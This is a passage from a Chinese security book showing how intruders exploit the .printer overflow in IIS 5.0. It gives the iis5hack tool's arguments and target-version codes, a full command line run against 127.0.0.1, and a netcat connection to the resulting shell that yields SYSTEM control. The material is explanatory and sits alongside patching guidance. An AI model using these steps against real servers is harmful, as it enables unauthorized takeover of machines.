关于printer漏洞原理,本书已在4.2.5小节 .printer漏洞修补中做了详细的介绍,由于.printer漏洞只有IIS5.0(Windows 2000 Server)存在,所以入侵者通过此漏洞入侵计算机只会针对IIS5.0进行,下面看看入侵者是如何利用.printer漏洞对服务器进行攻击的。
入侵者找到一台存在有.printer漏洞的IIS5.0服务器,下载一个在Windows平台上进行的.printer溢出程序—— iis5hack。
在命令提示符下运行iis5hack程序,如图6-55所示。
iis5hack使用说明如下。
<Host>:溢出的主机
<HostPort>:主机的端口
<HostType>:溢出主机的类型
<ShellPort>:溢出的端口
图6-55 IIS5hack程序运行界面
主机类型:
chinese edition: 0
chinese edition: sp1: 1 中文版IIS5.0
english edition: 2
english edition: sp1: 3 英文版IIS5.0
japanese edition: 4
japanese edition, sp1: 5 日文版IIS5.0
korea edition: 6
korea edition, sp1: 7 朝文版IIS5.0
mexico edition: 8
mexico edition, sp1: 9 墨西哥版IIS5.0
命令行运行格式:
iis5hack 溢出主机地址 主机的端口 溢出主机的类型 溢出的端口
入侵测试:
(1) 找到一台存有.printer漏洞的IIS5.0服务器,这里目标机的IP地址为127.0.0.1。
(2) 打开命令提示符程序,在提示符下输入以下命令格式:
iis5hack 127.0.0.1 80 1 3739
如图6-56所示。
图6-56 测试.printer溢出
提示:
iis5hack是指 .printer溢出程序,127.0.0.1为存有.printer溢出漏洞的主机,80是指主机的端口,1是指.printer溢出主机的类型为中文版,3739为溢出的端口。
(3) 如果.printer溢出成功的话,会出现提示内容,如图6-57所示。
图6-57 .printer溢出成功
(4) .printer溢出成功后,iis5hack将提示:现在你可以远程登录到3739端口。
(5) 这时使用nc.exe程序登录到溢出的服务器上,如图6-58所示。
图6-58 登录到溢出的服务器
(6) 入侵测试成功,成功取得System的权限,如图6-59所示。
图6-59 入侵成功
提示:
此时入侵者完全控制了目标机,可以进行任何操作。
(7) 入侵测试完毕。
……